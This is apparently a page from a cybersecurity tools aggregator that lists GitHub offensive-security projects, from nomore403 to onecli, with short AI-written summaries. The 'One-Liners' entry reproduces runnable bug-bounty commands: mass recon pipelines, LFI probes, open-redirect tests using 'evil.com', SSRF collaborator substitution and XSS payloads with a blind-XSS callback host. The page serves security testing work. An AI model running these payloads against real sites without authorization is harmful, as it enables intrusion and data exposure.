> cat /dev/github | grep security-tools

~/hackyfeed $

A cybersecurity tools aggregator — discover the latest pentesting, red team, and offensive security tools from GitHub.


nomore403

AI Summary: NoMore403 is a specialized tool for cybersecurity professionals aimed at bypassing HTTP 40X errors during web security assessments. It employs multiple techniques such as header manipulation, method tampering, and custom path testing to automate the bypass process, featuring smart output filtering to highlight significant results and high concurrency for efficient testing. Notable capabilities include auto-calibration, deduplication of results, color-coded output, and customizable payloads for enhanced flexibility.


README


NoMore403


Nope-Proxy

AI Summary: NoPE Proxy is a Burp Suite extension that facilitates the interception and analysis of TCP and UDP traffic, including non-HTTP protocols. Its notable features include a configurable DNS server that routes traffic to Burp, support for multiple listening ports for man-in-the-middle (MiTM) connections, and the ability to define match and replace rules for traffic manipulation. This tool is especially useful for security testing of mobile applications and thick clients, allowing seamless traffic analysis and modification.

noseyparker

AI Summary: Nosey Parker is a command-line interface (CLI) tool designed for scanning textual data to identify secrets and sensitive information, essentially functioning as a specialized grep for secret detection. Targeted primarily at offensive security operations, it offers features such as flexible scanning of various data sources, usage of 188 precision-focused regex rules, deduplication of matches to streamline review processes, and high-speed scanning capabilities, making it suitable for large-scale security engagements. Note that Nosey Parker has been officially retired and replaced by the tool Titus.

NoSQLMap

AI Summary: NoSQLMap is a Python tool designed for auditing and automating injection attacks on NoSQL databases, primarily targeting MongoDB and CouchDB, while also preparing for support of others like Redis and Cassandra. It helps identify and exploit default configuration vulnerabilities to disclose or replicate database data through a user-friendly menu-based interface. Key features include options for NoSQL DB access attacks, web application attacks, and scanning for anonymous MongoDB access.

npq

AI Summary: npq is a tool designed to audit npm packages prior to installation, enhancing security during the package management process. It performs multiple checks, including vulnerability assessments using the Snyk database, package age, popularity metrics, and the presence of essential documentation files. Notable features include an auto-continue mode after warnings and customizable settings for strict security reviews.


README

npq allows you to audit npm packages before you install them

nuclei-wordfence-cve

AI Summary: The Nuclei + Wordfence CVE project provides a comprehensive set of 71,889 Nuclei templates specifically designed for assessing security vulnerabilities in WordPress, including core, plugins, and themes. Notably, the templates are regularly updated to reflect the latest threats identified by Wordfence, offering users a robust tool for proactive site protection and vulnerability identification. This open-source solution allows for customization, giving users the flexibility to adapt templates to meet specific security needs.

o365recon

AI Summary: o365recon is a PowerShell script designed for retrieving information from Office 365 and Azure AD using valid credentials. Its primary use case is to facilitate information gathering for security assessments, with a notable feature allowing optional Azure querying through a simple command-line interface. The tool requires the installation of MSOnline and AzureAD modules and includes support for multi-factor authentication.


README

o365recon

Script to retrieve information via O365 and AzureAD with valid credentials.

o365spray

AI Summary: o365spray is a specialized tool for username enumeration and password spraying targeting Microsoft Office 365 (O365) environments. It allows users to validate domains, enumerate usernames, and conduct password spraying attacks, featuring configurable options for lockout policies and enumeration modules. The tool emphasizes caution by automatically managing lockout timers during operations to mitigate potential account lockouts.


README

o365spray

o365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365). This tool reimplements a collection of enumeration and spray techniques researched and identified by those mentioned in Acknowledgments.

obfuscator

AI Summary: Obfuscator is a native C++23 code obfuscation tool designed to enhance software security by transforming executable code through various methods such as bogus control flow and constant encryption. Its primary use case is to protect applications from decompilation and reverse engineering, making it compatible with popular disassemblers like IDA and Ghidra. Notable features include customizable function and transform configurations, support for both Linux and Windows platforms, and the ability to specify additional debugging information through PDB and MAP files.

obfuscator-io-deobfuscator

AI Summary: The Obfuscator.io Deobfuscator is a tool designed to reverse the obfuscation applied by Obfuscator.io, enabling the recovery of original scripts. Its primary use case is to facilitate code analysis and debugging by recovering strings, removing unnecessary code, and simplifying complex structures without executing untrusted code. Notable features include automatic configuration detection, improved readability through control flow restoration, and compatibility with various forks of the original obfuscator.


README

Obfuscator.io Deobfuscator

A deobfuscator for scripts obfuscated by Obfuscator.io

obliteration

AI Summary: Obliteration is an open-source PlayStation 4 kernel reimplementation in Rust, designed to enable the execution of dumped PlayStation 4 system software on various operating systems, including Windows, Linux, and macOS. Notable features include cross-platform support with native binaries, near-native performance leveraging hypervisor technologies, and a kernel architecture aimed to closely resemble the original PlayStation 4 kernel for enhanced compatibility. Currently, the project is in early development and does not yet support game execution.

obsidian-osint-templates

AI Summary: The Obsidian OSINT Templates provide structures and frameworks for organizing data during Open Source Intelligence (OSINT) investigations using the Obsidian notetaking tool. Notable features include customizable templates designed to enhance data recording and connection-making, which facilitate efficient analysis and documentation of investigative findings. This resource aims to support both new and experienced users in effectively leveraging Obsidian for their OSINT needs.


README

obsidian-osint-templates

License: Copyright (c) 2024 Micah Hoffman

Octopus

AI Summary: Octopus is an open-source, pre-operation command-and-control (C2) server developed in Python, designed for red team operations to facilitate initial attacks and information gathering before launching full engagements. It features secure communications through AES-256 encryption, remote command execution, file transfers, and a unique Endpoint Situational Awareness (ESA) capability that allows users to assess target environments effectively. The tool supports multiple Windows versions and enables stealthy operations, making it less detectable by conventional security measures.

odat

AI Summary: ODAT (Oracle Database Attacking Tool) is an open-source penetration testing tool designed to assess the security of Oracle databases remotely. Key features include the capability to identify valid SIDs and credentials, escalate privileges to DBA or SYSDBA, and execute system commands like reverse shells. It supports various Oracle Database versions and offers extensive options for connectivity checks and detailed database information extraction.


README

Quentin HARDY
quentin.hardy@protonmail.com
quentin.hardy@bt.com

ODAT

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

offensive-docker

AI Summary: Offensive Docker is a Docker image designed to facilitate the rapid setup of a penetration testing environment by bundling a comprehensive suite of commonly used security tools. Its primary use case is to streamline the pentesting process, featuring tools for port scanning, reconnaissance, web application testing, and brute-forcing, among others. Notably, it allows users to quickly deploy a fully equipped pentesting environment in various cloud platforms, enhancing efficiency in security assessments.

Offensive-OSINT-Tools

AI Summary: Offensive-OSINT-Tools is a curated collection of essential tools tailored for Offensive Security specialists engaged in penetration testing and red teaming. It streamlines the OSINT process by categorizing tools for various purposes, including domain investigation, email address collection, and information gathering. Notable features include the ability to efficiently search for subdomains and URLs, along with a focus on usability by providing only the most relevant tools, rather than an overwhelming list.

Offensive-Resources

AI Summary: Offensive-Resources V4 is a comprehensive repository designed for offensive security practitioners, providing an extensive collection of learning materials and labs across various cybersecurity domains. Its primary use case is to facilitate skill development in offensive security techniques, with notable features including a wide range of topics from exploit development to IoT and hardware hacking, structured resources for diverse platforms, and an open invitation for community contributions.


README

Offensive-Resources V4

((O Allah, benefit me with what You have taught me, teach me what benefits me, and increase me in knowledge))

OffSec-Reporting

AI Summary: OffSec Reporting is a customizable platform designed for security professionals to efficiently create penetration test reports tailored for Offensive Security certifications. Built on SysReptor, it enables users to write reports in Markdown, render them as PDFs, and supports various OffSec certifications including OSCP, OSEP, and OSWP. Notable features include free accessibility, rapid report generation, and a focus on facilitating the testing process without the burden of formatting.


README

OffSec Reporting using SysReptor


ofrak

AI Summary: OFRAK (Open Firmware Reverse Analysis Konsole) is a comprehensive binary analysis and modification platform designed specifically for embedded firmware and various binary formats. Its notable features include an interactive GUI for detailed exploration, a Python API for scripting reusable analyses, recursive unpacking and repacking capabilities, and integration with advanced reverse engineering tools such as angr and Ghidra, allowing users to effectively identify, analyze, and modify complex firmware.


README

OFRAK

OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

ohshint.gitbook.io

AI Summary: OH SHINT is an informational blog focused on open-source intelligence (OSINT) and related topics, including operational security, surveillance, and counter-surveillance techniques. The blog aims to document various resources, tools, and methods for conducting OSINT investigations while sharing insights from the author’s expertise as a licensed private investigator. Notable features include comprehensive write-ups, guides, and resources that cover a wide array of intelligence-related subjects, catering to both amateurs and professionals in the field.

oletools

AI Summary: oletools is a Python package designed for analyzing Microsoft OLE2 files, including older Microsoft Office documents, MSI files, and Outlook messages, primarily for malware detection, forensics, and debugging. Key features include the ability to detect, extract, and analyze VBA macros, OLE objects, Excel 4 macros (XLM), DDE links, and capabilities for analyzing RTF and OpenXML files. The tool is built on the olefile parser, enhancing its functionality with various detection mechanisms and logging options.

On-Chain-Investigations-Tools-List

AI Summary: The On-Chain Investigations Tools List is a comprehensive repository designed for conducting thorough investigations into blockchain-related activities. Its primary use case is to provide a curated compilation of tools and resources for tracking crypto hacks, security incidents, and on-chain analysis, featuring various utilities for data analysis, such as Nansen, Dune, and Metasleuth. Notable features include diverse categories of tools, a knowledge hub, and educational articles that guide users in developing effective investigative methodologies.

one_gadget

AI Summary: OneGadget is a Ruby gem designed for locating one-gadget RCE exploits within libc binaries, simplifying the process for participants in Capture The Flag (CTF) challenges. It leverages symbolic execution to efficiently identify gadgets that result in the execution of /bin/sh, supports multiple architectures (i386, amd64, aarch64), and offers a command-line interface for user-friendly interaction with customizable output options.


README



OneGadget

When playing CTF pwn challenges, we usually need the one-gadget RCE (remote code execution), which leads to a call to execve('/bin/sh', NULL, NULL).

One-Liners

AI Summary: One-Liners is a comprehensive toolkit designed for bug bounty hunters, facilitating rapid reconnaissance and vulnerability scanning through efficient one-liner commands. It primarily focuses on subdomain enumeration, open redirect testing, LFI, SSRF, and XSS detection using various profiling tools like subfinder, dnsx, and nuclei. Notable features include integration with multiple API sources for subdomain discovery and streamlined workflows for testing web application vulnerabilities.


README

One-Liners for bug bounty

Thanks to all who created these awesome one-liners ❤️


One Line recon using pd tools

subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports.txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt

Subdomain Enumeration

## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1  | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'

## from BufferOver.run
curl -s "https://dns.bufferover.run/dns?q=.target.com" | jq -r '.FDNS_A[]' | cut -d',' -f2 | sort -u

## from Riddler.io

curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

## from RedHunt Labs Recon API
curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=<target.com>&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r

## from nmap
nmap --script hostmap-crtsh.nse target.com

## from CertSpotter
curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq '.[].dns_names' | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from Archive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

## from JLDC
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

## from ThreatMiner
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u

## from Anubis
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"

## from ThreatCrowd
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"

## from HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"

## from AlienVault
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u

## from Censys
censys subdomains target.com

## from subdomain center
curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -u

LFI:

cat targets.txt | (gau || hakrawler || waybackurls || katana) |  grep "=" |  dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

Open Redirect:

echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host; do curl -s -L "$host" -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n"; done
cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'

SSRF:

cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr 

XSS:

Knoxss mass hunting

file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file
cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep =  | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"
cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe
echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo -e "$host \033[0;31mVulnerable"; done
cat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht
cat subs.txt | awk '{print $3}' | httpx -silent | xargs -I@ sh -c 'python3 xsstrike.py -u @ --crawl'

Hidden Dirs:

dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt
ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json

ffuf json to txt output

cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txt

Search for Sensitive files from Wayback

onecli

AI Summary: OneCLI is an open-source credential management gateway designed for AI agents, providing a secure method to store and inject API keys without exposing them to the agents themselves. It offers features such as AES-256-GCM encrypted secret storage, transparent credential injection, host and path matching for secret routing, and support for multiple agents with scoped permissions. The system enables easy setup via Docker and integrates with external vaults like Bitwarden for on-demand credential access, enhancing security and manageability in API interactions.